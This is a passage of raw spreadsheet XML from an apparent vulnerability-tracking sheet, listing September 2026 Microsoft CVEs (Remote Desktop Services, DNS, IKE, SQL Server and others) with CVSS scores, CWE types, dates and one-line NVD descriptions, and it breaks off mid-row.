          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K728" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L728" s="5" t="inlineStr"/>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q728" s="5" t="inlineStr"/>
      <c r="R728" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S728" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68887</t>
        </is>
      </c>
      <c r="D729" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F729" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr"/>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q729" s="5" t="inlineStr"/>
      <c r="R729" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S729" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69329</t>
        </is>
      </c>
      <c r="D730" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F730" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr"/>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q730" s="5" t="inlineStr"/>
      <c r="R730" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-190</t>
        </is>
      </c>
      <c r="S730" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in BranchCache allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69329</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69342</t>
        </is>
      </c>
      <c r="D731" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F731" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K731" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L731" s="5" t="inlineStr"/>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q731" s="5" t="inlineStr"/>
      <c r="R731" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S731" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69378</t>
        </is>
      </c>
      <c r="D732" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F732" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr"/>
      <c r="K732" s="5" t="inlineStr"/>
      <c r="L732" s="5" t="inlineStr"/>
      <c r="M732" s="5" t="inlineStr"/>
      <c r="N732" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O732" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P732" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q732" s="5" t="inlineStr"/>
      <c r="R732" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S732" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion in Microsoft Exchange Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69378</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69397</t>
        </is>
      </c>
      <c r="D733" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F733" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I733" s="5" t="inlineStr"/>
      <c r="J733" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K733" s="5" t="inlineStr"/>
      <c r="L733" s="5" t="inlineStr"/>
      <c r="M733" s="5" t="inlineStr"/>
      <c r="N733" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O733" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P733" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q733" s="5" t="inlineStr"/>
      <c r="R733" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S733" s="5" t="inlineStr">
        <is>
          <t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69428</t>
        </is>
      </c>
      <c r="D734" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F734" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr"/>
      <c r="L734" s="5" t="inlineStr"/>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q734" s="5" t="inlineStr"/>
      <c r="R734" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S734" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69429</t>
        </is>
      </c>
      <c r="D735" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F735" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr"/>
      <c r="L735" s="5" t="inlineStr"/>
      <c r="M735" s="5" t="inlineStr"/>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q735" s="5" t="inlineStr"/>
      <c r="R735" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S735" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows IKE Extension allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69429</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69443</t>
        </is>
      </c>
      <c r="D736" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F736" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr"/>
      <c r="K736" s="5" t="inlineStr"/>
      <c r="L736" s="5" t="inlineStr"/>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q736" s="5" t="inlineStr"/>
      <c r="R736" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S736" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69514</t>
        </is>
      </c>
      <c r="D737" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F737" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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37" s="5" t="inlineStr"/>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q737" s="5" t="inlineStr"/>
      <c r="R737" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S737" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69539</t>
        </is>
      </c>
      <c r="D738" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F738" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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38" s="5" t="inlineStr"/>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q738" s="5" t="inlineStr"/>
      <c r="R738" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S738" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69587</t>
        </is>
      </c>
      <c r="D739" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F739" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr"/>
      <c r="K739" s="5" t="inlineStr"/>
      <c r="L739" s="5" t="inlineStr"/>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q739" s="5" t="inlineStr"/>
      <c r="R739" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S739" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69587</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69588</t>
        </is>
      </c>
      <c r="D740" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F740" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr"/>
      <c r="L740" s="5" t="inlineStr"/>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q740" s="5" t="inlineStr"/>
      <c r="R740" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S740" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows TCP/IP allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69588</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69599</t>
        </is>
      </c>
      <c r="D741" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F741" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K741" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L741" s="5" t="inlineStr"/>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q741" s="5" t="inlineStr"/>
      <c r="R741" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S741" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69607</t>
        </is>
      </c>
      <c r="D742" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F742" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr"/>
      <c r="L742" s="5" t="inlineStr"/>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q742" s="5" t="inlineStr"/>
      <c r="R742" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S742" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69631</t>
        </is>
      </c>
      <c r="D743" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F743" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr"/>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q743" s="5" t="inlineStr"/>
      <c r="R743" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S743" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69631</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69710</t>
        </is>
      </c>
      <c r="D744" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F744" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr"/>
      <c r="K744" s="5" t="inlineStr"/>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q744" s="5" t="inlineStr"/>
      <c r="R744" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S744" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69710</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69739</t>
        </is>
      </c>
      <c r="D745" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr">
        <is>
